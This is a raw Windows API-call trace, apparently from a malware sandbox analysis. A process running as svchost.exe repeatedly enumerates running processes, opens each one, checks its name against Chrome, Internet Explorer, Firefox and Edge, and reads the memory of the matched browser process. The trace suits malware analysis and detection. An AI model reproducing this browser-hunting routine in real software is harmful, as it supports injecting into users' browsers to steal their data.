	[0233.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.858] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.858] NtQueryInformationProcess (in: ProcessHandle=0x71e0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.858] ReadProcessMemory (in: hProcess=0x71e0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.858] ReadProcessMemory (in: hProcess=0x71e0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.858] ReadProcessMemory (in: hProcess=0x71e0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.859] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x71e4
	[0233.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.860] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.860] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.861] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0233.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.861] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.862] NtQueryInformationProcess (in: ProcessHandle=0x71e4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.862] ReadProcessMemory (in: hProcess=0x71e4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.862] ReadProcessMemory (in: hProcess=0x71e4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.862] ReadProcessMemory (in: hProcess=0x71e4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.862] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x71e8
	[0233.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.863] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.863] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.864] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.864] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.864] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0233.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x71ec
	[0233.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.865] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0233.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.865] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.866] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0233.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.866] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x71f0
	[0233.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.867] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.868] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.868] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x71f4
	[0233.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.870] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.870] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.871] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.871] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.871] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x71f8
	[0233.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.872] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.872] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.873] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.873] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.873] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x71fc
	[0233.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.874] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.874] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0233.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x7200
	[0233.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.877] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.877] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.877] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.878] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7204
	[0233.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.879] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.879] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.879] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.880] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7208
	[0233.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.881] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.881] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.881] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.882] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0233.883] CloseHandle (hObject=0x4fd0) returned 1
	[0233.883] Sleep (dwMilliseconds=0x64) 
	[0233.986] GetCurrentProcessId () returned 0x110
	[0233.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0233.989] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0233.990] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0233.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0233.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x720c
	[0233.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.993] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.993] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.993] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.994] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0233.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7210
	[0233.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.995] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.996] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.996] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.996] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.997] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0233.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7214
	[0233.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.998] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0233.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.998] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.999] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0233.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.999] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7218
	[0234.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.000] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.001] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.001] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.001] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.001] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0234.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x721c
	[0234.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.002] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0234.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.003] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.003] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0234.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.003] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.003] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0234.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7220
	[0234.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.004] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0234.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.005] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.005] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0234.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.005] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.006] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0234.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7224
	[0234.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.006] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0234.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.007] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.007] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0234.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.007] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0234.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7228
	[0234.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.008] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.009] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.009] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.009] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x722c
	[0234.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.010] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.010] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.011] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.011] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7230
	[0234.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.012] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.012] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.013] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.013] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7234
	[0234.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.014] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.014] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.015] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.015] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.015] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7238
	[0234.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
